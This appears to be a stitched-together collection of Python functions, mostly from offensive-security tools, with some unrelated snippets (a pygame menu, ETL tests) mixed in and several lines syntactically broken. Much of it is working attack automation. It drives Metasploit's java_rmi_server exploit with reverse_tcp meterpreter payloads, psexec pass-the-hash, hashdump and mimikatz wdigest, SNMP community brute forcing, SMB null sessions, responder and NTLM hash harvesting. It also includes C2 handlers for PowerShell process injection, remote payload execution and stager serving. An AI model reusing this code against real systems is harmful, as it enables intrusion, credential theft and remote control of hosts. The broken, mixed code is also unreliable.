def processTarget(self, t, port): if not self.seentarget(t + str(port)): self.addseentarget(t + str(port)) self.display.verbose(self.shortName + " - Connecting to " + t) try: conn = httplib.HTTPConnection(t, port, timeout=10) conn.request('OPTIONS', '/') response = conn.getresponse() text = "" allowed = response.getheader('allow') outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str( port) + "_" + Utils.getRandStr(10) if (allowed): badoptions = ['PUT', 'DELETE', 'TRACE', 'TRACK'] for badopt in badoptions: if (allowed.contains(badopt)):"httpOption" + badopt) self.addVuln(t, "httpOption" + badopt, {"port": str(port), "output": outfile.replace("/", "%2F")}) self.display.error("VULN [httpOption%s] Found on [%s:%i]" % (badopt, host, int(port))) text = "Allowed HTTP Options for %s : %s\n\nFull Headers:\n%s" % ( t, allowed, self.print_dict(response.getheaders())) else: text = "Allowed HTTP Options for %s : OPTIONS VERB NOT ALLOWED\n\nFull Headers:\n%s" % ( t, self.print_dict(response.getheaders())) Utils.writeFile(text, outfile) except httplib.BadStatusLine: pass # except socket.error as e: except: pass
def downloadAttachment(self, messageid=None): if (not self.srv): return if messageid: resp, data = self.srv.fetch(messageid, "(RFC822)") # fetching the mail, "`(RFC822)`" means "get the whole stuff", # but you can ask for headers only, etc email_body = data[0][1] # getting the mail content mail = email.message_from_string(email_body) # parsing the mail content to get a mail object # Check if any attachments at all if mail.get_content_maintype() != 'multipart': return # we use walk to create a generator so we can iterate on the parts and forget about the recursive headach for part in mail.walk(): # multipart are just containers, so we skip them if part.get_content_maintype() == 'multipart': continue # is this part an attachment ? if part.get('Content-Disposition') is None: continue filename = part.get_filename() if (not filename): continue file_path = os.path.join(self.config["outdir"], filename) print "Downloading attachment [%s] to [%s]" % (messageid, file_path) Utils.writeFile(part.get_payload(decode=True), file_path, "wb") return
def searchDir(self, host, conn, share, path, depth=0): if depth > 5: return try: # list the files on each share (recursivity?) names = conn.listPath(share, path, timeout=30) for name in names: if name.isDirectory: if name.filename not in [u'.', u'..']: self.searchDir(conn, host, share, path + name.filename + '/', depth + 1) else: for pattern in self.filepatterns: try: re.compile(pattern) result = re.match(pattern, name.filename) if (result): #download the file outfile = self.config["proofsDir"] + self.shortName + "_" + host + "_" + share + "_" + name.filename.replace("/", "-") + "_" + Utils.getRandStr(10) temp_fh = StringIO() conn.retrieveFile(share, path + name.filename, temp_fh) Utils.writeFile(temp_fh.getvalue(), outfile) self.display.debug("_____ Share[" + share + "] =" + path + name.filename) except re.error: pass #self.display.debug("Invalid File Pattern --> %s <--" % pattern) except: self.display.debug('### can not access the resource') return
def searchTarget(self, target, port, username, password): success = False # start packet capture cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10, srcip="", dstip=target) try: if (Utils.port_open(target, 21)): # attempt to connect to the remote host with ftputil.FTPHost(target, username, password) as host: success = True # get list of files and loop over them recursive = host.walk("/", topdown=True, onerror=None) for root, dirs, files in recursive: for name in files: for pattern in self.filepatterns: match_list = fnmatch.filter(files, pattern) for fname in match_list: fpath = host.path.join(root, fname) if host.path.isfile(fpath):, self.config["proofsDir"] + ip + fpath.replace("/", "_")) host.close() except ftputil.error.PermanentError: self.display.error("Could not connect to %s on port 21" % (target)) outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str( port) + "_" + target + "_" + Utils.getRandStr(10) Utils.writeFile(self.getPktCap(cap), outfile) kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) return success
def run(self, argv): # load config self.parse_parameters(argv) self.load_config() # validate that all necessary flags/configs were set # if single username and password if (self.config["username"] and self.config["password"]): mp.pillage(username=self.config["username"], password=self.config["password"], server=self.config["server"], servertype=self.config["servertype"], domain=self.config["domain"]) # if seperate username and password files elif (Utils.isReadable(self.config["usernamefile"]) and Utils.isReadable(self.config["passwordfile"])): usernames = list() passwords = list() with open(self.config["usernamefile"]) as f: usernames = with open(self.config["passwordfile"]) as f: passwords = for u in usernames: for p in passwords: mp.pillage(username=u, password=p, server=self.config["server"], port=int(self.config["serverport"]), domain=self.config["domain"]) elif Utils.isReadable(self.config["usernamepasswordfile"]): # if a combined username password file usernames = list() with open(self.config["usernamepasswordfile"]) as f: usernamespasswords = for temp in usernamepasswords: (u, p) = temp.split(":", 1) mp.pillage(username=u, password=p, server=self.config["server"], port=int(self.config["serverport"]), domain=self.config["domain"])
def load_config(self): # does config file exist? if (self.config["config_filename"] is not None): temp1 = self.config temp2 = Utils.loadConfig(self.config["config_filename"]) self.config = dict(temp2.items() + temp1.items()) else: # guess not.. so try to load the default one if Utils.is_readable("default.cfg"): self.display.error("a CONFIG FILE was not specified... defaulting to [default.cfg]") print temp1 = self.config temp2 = Utils.loadConfig("default.cfg") self.config = dict(temp2.items() + temp1.items()) else: # someone must have removed it! self.display.error("a CONFIG FILE was not specified...") print sys.exit(1) # set verbosity/debug level if (self.config['verbose'] >= 1): self.display.enableVerbose() if (self.config['verbose'] > 1): self.display.enableDebug()
def view_event(self, data): log_path = Utils.get_arg_at(data, 1, 2) if log_path == "": UI.error("Missing arguments") return log_path += ".log" rows = Utils.get_arg_at(data, 2, 2) if rows == "": rows = 10 else: try: rows = int(rows) except: rows = 10 log_path = Log.get_current_path(log_path) data = [] if Utils.file_exists(log_path): for line in open(log_path, "rb").readlines(): data.append(line) print "\nLast %d lines of log\n-----------------------\n" % rows data = list(reversed(data)) for i in range(0, rows): try: print data[i] except: pass
def exec_code(self, data): try: cmd, path = data.split(" ", 1) except: UI.error("Missing arguments") return "" data = ";" path = self.alias.get_alias(path) if Utils.file_exists(path, False, False): data = Utils.load_file_unsafe(path) else: data = Utils.download_url(path) if not data == ";": UI.success("Fetching %s" % path) data = base64.b64encode(data) ps = Utils.load_powershell_script("exec.ps1", 12) ps = Utils.update_key(ps, "PAYLOAD", data) UI.success("Payload should be executed shortly on the target") return ps else: UI.error("Cannot fetch the resource") return data
def downloadAttachment(self, messageid=None): if (not self.srv): return if (not messageid): return (server_msg, body, octets) = self.srv.retr(messageid) msg = email.message_from_string('\n'.join(body)) # save attach for part in msg.walk(): if part.get_content_maintype() == 'multipart': continue if part.get('Content-Disposition') is None: continue filename = part.get_filename() if not (filename): continue file_path = os.path.join(self.config["outdir"], filename) print "Downloading attachment [%s] to [%s]" % (messageid, file_path) Utils.writeFile(part.get_payload(decode=True), file_path, "wb") return None
def writeMessage(self, messageid, text): filename = self.user + "_" + messageid filename = "".join(c for c in filename if c.isalnum()).rstrip() file_path = os.path.join(self.config["outdir"], filename) print "Downloading message id [%s] to [%s]" % (messageid, file_path) Utils.writeFile(text, file_path)
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("getuid\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") outfile = self.config[ "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in text.splitlines(): m = re.match(r'^\s*Server username: (.*)\s*', line) if (m): self.display.verbose("Metasploit Session [" + s + "] running as user [" + + "]") msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("sysinfo\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") outfile = self.config[ "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in text.splitlines(): m = re.match(r'^\s*OS\s\s*: (.*)\s*', line) if (m): self.display.verbose("Metasploit Session [" + s + "] running on OS [" + + "]") # clean up after ourselves result = msf.cleanup() return
def processTarget(self, t, port): if not self.seentarget(t + str(port)): self.addseentarget(t + str(port)) self.display.verbose(self.shortName + " - Connecting to " + t) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(port) + "_" + Utils.getRandStr( 10) + ".png" url = "http://" + t + ":" + str(port) Utils.webScreenCap(url, outfile)
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/smb/smb_enumusers\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("run\n") # msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (".*execution completed.*", result) is None): result = result + msf.getResult() # TODO - process results and store user list to KB # need to do something better with this. # loop over each user and store in the KB # if local, store in "/host/" + t + "/user/" + user # if domain, store in "/domain/" + domainname + "/user/" + user # for now, just print out the results # MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras) parts = re.findall(".*" + t.replace(".", "\.") + ".*", result) for part in parts: if "RHOSTS" in part: pass else: try: pieces = part.split() domain = pieces[3] kb.add("domain/" + domain.strip() + "/host/" + t) extras = part.split('(')[1].split(')')[0] users = part.split('[')[3].split(']')[0].split(',') for user in users: kb.add("host/" + t + "/user/" + user.strip()) except: pass outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('shell/' + t + '/msf') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) myMsf.lock.acquire() msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("hashdump\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") msf.sleep(int(self.config['msfexploitdelay'])) # TODO - process results and store results in KB # regex match on [^:]+:[^:]+:[^:]+:[^:]+::: outfile = self.config[ "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() myMsf.lock.release() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("load mimikatz\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("wdigest\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") # TODO - process results and store results in KB outfile = self.config[ "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def powerless(self, data): try: cmd, ps_cmd = data.split(" ", 1) except: UI.error("Missing arguments") return "" ps = Utils.load_powershell_script("powerless.ps1", 22) ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(ps_cmd)) return ps
def run(self, target="", ports="1-1024", flags="-sS", vector="", filetag=""): # get tmp file proofsDir = "" if "proofsDir" in self.config.keys(): proofsDir = self.config["proofsDir"] self.outfile = proofsDir + "NMAP-" + filetag + "-" + Utils.getRandStr(10) command = "nmap " + flags + " -p " + ports + " -oA " + self.outfile + " " + target tmp_results = Utils.execWait(command) self.display.output("Scan file saved to [%s]" % self.outfile) return self.loadXMLFile(self.outfile + ".xml", "nmapFile")
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/multi/misc/java_rmi_server\n") msf.execute("set RHOST %s\n" % t) #msf.execute("set TARGET 0\n") msf.execute("set TARGET 2\n") msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp") msf.execute("set LPORT 4445\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) parts = re.findall(".*Meterpreter session.*", result) for part in parts: callFire = True self.addVuln(t, "JavaRMI", {"port": "1099", "output": outfile.replace("/", "%2F")}) if callFire:"msfSession") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # get windows domain/workgroup temp_file2 = self.config[ "proofsDir"] + "nmblookup_" + t + "_" + Utils.getRandStr( 10) command2 = "nmblookup -A " + t result2 = Utils.execWait(command2, temp_file2) workgroup = "WORKGROUP" for line in result2.split('\n'): m = re.match(r'\s+(.*)\s+<00> - <GROUP>.*', line) if (m): workgroup = self.display.debug( "found ip [%s] is on the workgroup/domain [%s]" % (t, workgroup)) # make outfile outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) # run rpcclient command = "smbclient -N -W " + workgroup + " -L " + t result = Utils.execWait(command, outfile) # check to see if it worked if "Anonymous login successful" in result: # fire a new trigger"nullSession") self.addVuln(t, "nullSession", { "type": "smb", "output": outfile.replace("/", "%2F") }) self.display.error("VULN [NULLSession] Found on [%s]" % t) # TODO - process smbclient results # parse out put and store any new info and fire any additional triggers else: # do nothing self.display.verbose("Could not get NULL Session on %s" % t) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/multi/misc/java_rmi_server\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set TARGET 0\n") msf.execute("set PAYLOAD java/meterpreter/reverse_tcp\n") msf.execute("run\n") msf.sleep(5) outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = msf.getResult() Utils.writeFile(result, outfile) parts = re.findall(".*Meterpreter session.*", result) for part in parts: callFire = True self.addVuln(t, "JavaRMI", { "port": "1099", "output": outfile.replace("/", "%2F") }) if callFire:"msfSession") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.execute("hashdump\n") msf.execute("background\n") # TODO - process results and store results in KB outfile = self.config[ "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.execute("load mimikatz\n") msf.execute("wdigest\n") msf.execute("background\n") # TODO - process results and store results in KB outfile = self.config[ "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def add_tag(self, buffer, current_line): self.tags_selection[current_line] = (self.tags_selection[current_line] + 1) % 2 if self.tags_selection[current_line] == 0: self.utils.add_breakpoint(Utils.convert_to_one_index(current_line)) else: self.utils.remove_breakpoint(Utils.convert_to_one_index(current_line)) if self.tags[current_line] is None: self.tags[current_line] = buffer.create_tag("tag_" + str(current_line), background="orange") buffer.apply_tag(self.tags[current_line], buffer.get_iter_at_line(current_line), buffer.get_iter_at_line(current_line + 1)) return self.tags[current_line].props.background = self.colors[self.tags_selection[current_line]]
def test_kato_file_extract(self): src_conf_path = os.path.join(WEB_SOURCES_CONFIG_DIR, 'web_statgov_kato.json') json_raw = Utils.read_file(src_conf_path) download_handler = HandlersFactory.get_handler( Downloader.handler_name(json_raw)) service = Downloader(json_raw, download_handler) file_path = extract_handler = HandlersFactory.get_handler( Extractor.handler_name(json_raw)) service = Extractor(json_raw, file_path, extract_handler) file_paths = service.extract() self.assertTrue(Utils.all_exists(file_paths))
def inject(self, data): try: option, pid, cmd = data.split(" ", 2) except: UI.error("Missing arguments") return "" ps = Utils.load_powershell_script("injector.ps1", 1) ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd)) ps = Utils.update_key(ps, "PID", pid) UI.success("Injecting %s" % cmd) UI.success("Into process with PID %s" % pid) return ps
def list_clients(self, data): print "\nList of active shells\n-----------------------\n" for shell in self.db.get_all_shells(): guid = shell.split(":")[0] timestamp = Utils.unix_to_date(self.db.get_data(shell)) prompt = self.db.get_data("%s:prompt" % guid) id = self.db.get_data("%s:id" % guid) if not id == "": if Utils.get_arg_at(data, 1, 2) == "full": print " %s\t%s %s last seen %s" % (id, prompt, guid, timestamp) else: print " %s\t%s" % (id, prompt)
def list_clients(self, data): print("\nList of active shells\n"+"-"*21+"\n") for shell in self.db.get_all_shells(): guid = shell.split(":")[0] timestamp = Utils.unix_to_date(self.db.get_data(shell)) prompt = self.db.get_data("%s:prompt" % guid) id = self.db.get_data("%s:id" % guid) if not id == "": if Utils.get_arg_at(data, 1, 2) == "full": print(" %s\t%s %s last seen %s" % (id, prompt, guid, timestamp)) else: print(" %s\t%s" % (id, prompt))
def downloadMessage(self, messageid=None): if (not self.srv): return if messageid: (server_msg, body, octets) = self.srv.retr(messageid) filename = self.user + "_" + str(messageid) file_path = os.path.join(self.config["outdir"], filename) print "Downloading message id [%s] to [%s]" % (messageid, file_path) Utils.writeFile(email_body, file_path) return None
def inject(self): try: (option, pid, cmd) =" ", 2) except: self.output += self.output_cli_or_str("Missing arguments") return "" ps = Utils.load_powershell_script( "%s/injector.ps1" % THUNDERSHELL.POWERSHELL_SCRIPT, 1) ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd)) ps = Utils.update_key(ps, "PID", pid) self.output += self.output_cli_or_str("Injecting %s" % cmd) self.output += self.output_cli_or_str("Into process with PID %s" % pid) return ps
def do_GET(self): force_download = False if self.path.split("/")[1] == "api": server_api = ServerApi(self.config, self) self.output = server_api.process() self.return_json() return path = self.path.split("/")[-1] payload_path = self.path.split("/") filename = Utils.gen_str(12) if payload_path[1] == self.config.get("http-download-path"): force_download = True extension = "ps1" payload = Payload(self.config) payload.set_callback("__default__") profile = self.config.get("profile") if profile.get("domain-fronting") == "on": payload.set_fronting(profile.get("domain-fronting-host")) if len(payload_path) > 3: payload.set_type(payload_path[2]) extension = payload_path[2] if extension == "exe-old": extension = "exe" if len(payload_path) > 4: payload.set_delay(payload_path[3]) payload.set_callback(payload_path[4]) filename = "%s.%s" % (Utils.gen_str(12), extension) Log.log_event( "Download Stager", "Stager was fetched from %s (%s). Stager type is %s" % (self.client_address[0], self.address_string(), extension)) self.output = payload.get_output() elif path in Utils.get_download_folder_content(): force_download = True self.output = Utils.load_file("download/%s" % path) Log.log_event( "Download File", "%s was downloaded from %s (%s)" % (path, self.client_address[0], self.address_string())) else: self.output = Utils.load_file( "html/%s" % self.config.get("http-default-404")) Log.log_error("Invalid request got a GET request", self.path) self.return_data(force_download, filename)
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/snmp/snmp_login\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set VERSION 2c\n") msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (".*execution completed.*", result) is None): result = result + msf.getResult() myMsf.lock.release() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) parts = re.findall(".*LOGIN SUCCESSFUL.*", result) for part in parts: callFire = True # Add all relevant details p = part.split() comString = p[p.index("SUCCESSFUL:") + 1] self.addVuln(t, "snmpCred", {"port": "161", "message": str(part), "communityString": comString, "output": outfile.replace("/", "%2F")}) if callFire:"snmpCred") # clean up after ourselves result = msf.cleanup() return
def output(self): job_file = os.path.join(JOBS_CONFIG_DIR, str(self.jobfile)) job_conf = Utils.read_file(job_file) base = os.path.basename(self.input().path) day ="%Y%m%d") ftp_path = os.path.join( FTP_REMOTE_PATH, "{}_{}.{}".format( os.path.splitext(base)[0], day, Utils.ext(self.input().path))) if Box(json.loads(job_conf)).gzip: ftp_path += '.gzip' return RemoteTarget(ftp_path, FTP_HOST, username=FTP_USER, password=FTP_PASS)
def test_companies_files_extract(self): src_conf_path = os.path.join(WEB_SOURCES_CONFIG_DIR, 'web_statgov_companies.json') json_raw = Utils.read_file(src_conf_path) download_handler = HandlersFactory.get_handler( Downloader.handler_name(json_raw)) service = Downloader(json_raw, download_handler) downloaded_files_path = extract_handler = HandlersFactory.get_handler( Extractor.handler_name(json_raw)) service = Extractor(json_raw, downloaded_files_path, TEMP_PATH, extract_handler) all_files = service.extract() self.assertTrue(Utils.all_exists(all_files))
def get_autocommands(self, guid): profile = self.config.get('profile') commands = profile.get('autocommands') if isinstance(commands, list): UI.success('Running auto commands on shell %s' % guid) Log.log_event('Running auto commands on shell', guid) for command in commands: print '\t[+] %s' % command Log.log_shell(guid, 'Sending', command) self.db.append_shell_data( guid, "[%s] AutoCommand Sending: \n%s\n" % (Utils.timestamp(), command)) self.db.push_cmd(guid, command, Utils.guid(), self.config.get('username'))
def __init__(self): disp_no = os.getenv("DISPLAY") if disp_no: logger.debug("I'm running under X display = {0}".format(disp_no)) # Check which frame buffer drivers are available # Start with fbcon since directfb hangs with composite output drivers = ['fbcon', 'directfb', 'svgalib'] found = False pygame.init() pygame.display.init() ''' for driver in drivers: # Make sure that SDL_VIDEODRIVER is set if not os.getenv('SDL_VIDEODRIVER'): os.putenv('SDL_VIDEODRIVER', driver) try: pygame.display.init() except pygame.error: logger.debug('Driver: {0} failed.'.format(driver)) continue found = True break ''' pygame.font.init() pygame.mouse.set_visible(0) #hide mouse self.screen = pygame.display.set_mode((WIDTH, HEIGHT)) #self.screen = pygame.display.set_mode((WIDTH, HEIGHT), pygame.FULLSCREEN) pygame.display.set_caption('Menu') self.clock = pygame.time.Clock() self.running = True self.loadAssets() logger.debug("launch joystics init...") utils = Utils() utils.initJoysticks() #disable mouse pygame.event.set_blocked(pygame.MOUSEMOTION) #movements and keys init self.downPushed = False self.upPushed = False self.leftPushed = False self.rightPushed = False self.joyUp = False self.joyDown = False self.joyLeft = False self.joyRight = False self.zPressed = False self.tPressed = False self.screensaver = False
def process(self): temp_file = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10) command = "responder -I eth0 -wrf" # run for 15 minutes # result = Utils.execWait(command, temp_file, timeout=900) result = Utils.execWait(command, temp_file, timeout=60) # TODO # check to see if we got any creds # if not, wait 5 minutes and run again for 15 minutes # repeat upto 5 4 times return
def __init__(self, data, req): = data self.utils = Utils() self.netutils = Network() self.metadata = { 'unique_id' : self.utils.generate_uuid(), 'timestamp' : self.utils.get_datetime(), 'node': gethostname(), 'issuer':{ 'user_agent':req.headers.get('User-Agent'), 'source_ip':req.remote_addr } }['metadata'] = self.metadata
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: users = kb.get("host/" + t + "/user") for user in users: hashes = kb.get ("host/" + t + "/user/" + user + "/fullhash") for passhash in hashes: # verify we have not tested this host before if not self.seentarget(t+user+passhash): # add the new IP to the already seen list self.addseentarget(t+user+passhash) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/windows/smb/psexec\n") # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n") # msf.execute("set LHOST %s\n" % self.config['lhost']) # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort())) # msf.execute("set LPORT 4444\n") msf.execute("set RPORT 445\n") msf.execute("set RHOST " + t + "\n") msf.execute("set SMBUser " + user + "\n") msf.execute("set SMBPass " + passhash + "\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) parts = re.findall(".*Meterpreter session (\d+) opened.*", result) for part in parts:"msfSession") self.display.verbose("NEW session on : " + t) kb.add("host/" + t + "/msfSession/" + str(part)) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: users = kb.get(['host/' + t + '/user']) self.display.verbose(self.shortName + " - Connecting to " + t) for user in users: # verify we have not tested this host before if not self.seentarget(t + str(user)): # add the new IP to the already seen list self.addseentarget(t + str(user)) passwords = kb.get( ['host/' + t + '/user/' + user + '/password']) for password in passwords: self.display.verbose(self.shortName + " - Connecting to " + t) # make outfile temp_file = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr( 10) # run command = self.config[""] + " -outputfile " + temp_file + " \"" + user + "\":\"" + password + \ "\"@" + t result = Utils.execWait(command, None) if Utils.isReadable(temp_file + '.sam'): with open(temp_file + '.sam', "r") as myfile: result = myfile.readlines() for line in result: m = line.split(':') user = m[0].strip() uid = m[1].strip() lmhash = m[2].strip() ntlmhash = m[3].strip() kb.add("host/" + t + "/user/" + user + "/lmhash/" + lmhash) kb.add("host/" + t + "/user/" + user + "/ntlmhash/" + ntlmhash) kb.add("host/" + t + "/user/" + user + "/fullhash/" + lmhash + ":" + ntlmhash)"newNTLMHash") return
def view_event(self, data): log_path = Utils.get_arg_at(data, 1, 2) if log_path == "": UI.error("Missing arguments") return if log_path == "key": UI.warn("Your encryption key is '%s'" % self.config.get("encryption-key")) return if log_path == "password": UI.warn("Your server password is '%s'" % self.config.get("server-password")) return if not log_path in ("http", "event", "error"): UI.error("Invalid path") return log_path += ".log" rows = Utils.get_arg_at(data, 2, 2) if rows == "": rows = 10 else: try: rows = int(rows) except: rows = 10 log_path = Log.get_current_path(log_path) data = [] if Utils.file_exists(log_path): for line in open(log_path, "rb").readlines(): data.append(line) data = list(reversed(data)) print("\nLast %d lines of log\n----------------------\n" % rows) data = list(data) for i in range(0, rows): try: print data[i] except: pass
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/snmp/snmp_login\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set VERSION 2c\n") msf.execute("run\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) parts = re.findall(".*LOGIN SUCCESSFUL.*", result) for part in parts: callFire = True # Add all relevant details p = part.split() comString = p[p.index("SUCCESSFUL:") + 1] self.addVuln(t, "snmpCred", {"port": "161", "message": str(part), "communityString": comString, "output": outfile.replace("/", "%2F")}) if callFire:"snmpCred") # clean up after ourselves result = msf.cleanup() return
